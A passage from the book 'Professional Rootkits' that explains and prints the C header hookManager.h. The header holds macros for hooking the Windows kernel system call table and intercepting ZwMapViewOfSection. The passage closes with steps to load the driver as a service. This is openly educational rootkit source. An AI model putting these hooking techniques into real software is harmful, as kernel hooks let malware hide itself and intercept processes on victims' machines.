Professional Rootkits (Programmer to Programmer)

The file hookManager.h first defines the ServiceDescriptorEntry structure. This is the structure for the KeServiceDescriptorTable, which must be imported. The structure is packed to match the actual structure in memory. The three externals, NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection are global variables defined in Ghost.c. The three macros, HOOK_INDEX, HOOK, and UNHOOK are defined to make hooking safe and easy. Finally, NewZwMapViewOfSection and Hook are the declarations for the functions implemented in hookManager.c:

// Copyright Ric Vieler, 2006 // Support header for hookManager.c #ifndef _HOOK_MANAGER_H_ #define _HOOK_MANAGER_H_ // The kernel's Service Descriptor Table #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; // Our System Call Table extern PVOID* NewSystemCallTable; // Our Memory Descriptor List extern PMDL pMyMDL; #define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1) #define HOOK(functionName, newPointer2Function, oldPointer2Function ) \ oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function) #define UNHOOK(functionName, oldPointer2Function) \ InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function) typedef NTSTATUS (*ZWMAPVIEWOFSECTION)( IN HANDLE SectionHandle, IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN ULONG CommitSize, IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, IN OUT PSIZE_T ViewSize, IN SECTION_INHERIT InheritDisposition, IN ULONG AllocationType, IN ULONG Protect ); extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection; NTSTATUS NewZwMapViewOfSection( IN HANDLE SectionHandle, IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN ULONG CommitSize, IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, IN OUT PSIZE_T ViewSize, IN SECTION_INHERIT InheritDisposition, IN ULONG AllocationType, IN ULONG Protect ); NTSTATUS Hook(); #endif

Once compiled and loaded using the Checked DDK icon and SCMLoader.exe from Chapters 1 and 2, you should be able to start the service using “net start MyDeviceDriver” and see the debug statement “comint32: NewZwMapViewOfSection” called whenever a new application is loaded.